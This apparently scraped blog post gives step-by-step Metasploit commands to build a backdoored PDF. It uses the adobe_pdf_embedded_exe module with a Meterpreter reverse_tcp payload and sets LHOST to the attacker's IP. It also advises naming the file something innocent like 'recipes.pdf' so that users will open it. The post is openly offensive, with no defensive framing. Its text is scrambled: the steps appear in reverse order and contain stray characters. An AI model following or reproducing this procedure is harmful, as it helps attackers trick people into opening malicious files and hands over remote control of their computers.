9/21/2023 0 Comments Perintah perintah metasploit![]() ![]() Now that all the options are set, we can run the exploit like this: ![]() Code:msf > exploit (adobe_pdf_embedded_exe) > set LHOST 192.168.1.8.Msf > exploit (adobe_pdf_embedded_exe) > set FILENAME recipes.pdfįinally, we need to specify the LHOST, which is our (the attackers) IP address. Change this to something innocent that will attract users to open it: The next option is the output file name, FILENAME. Code: msf > exploit (adobe_pdf_embedded_exe) > set INFILENAME example.pdf. ![]() You can see that we must provide an existing PDF file to the INFILENAME option in which to embed the meterpreter payload. Code:msf > exploit (adobe_pdf_embedded_exe) > show options.Code:msf > exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcpįirst, display the required options for the exploit:.I will use the meterpreter payload again, because it is one of the most powerful payloads available to us: Code:msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe.You should see the exploit "exploit/windows/fileformat/adobe_pdf_embedded_exe", which we will use: Code:msf > search type:exploit platform:windows adobe pdf.I will search metasploits database for an exploit for adobe pdf on windows, using this command: ♨️How to Embed a backdoor in a PDF file♨️ ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |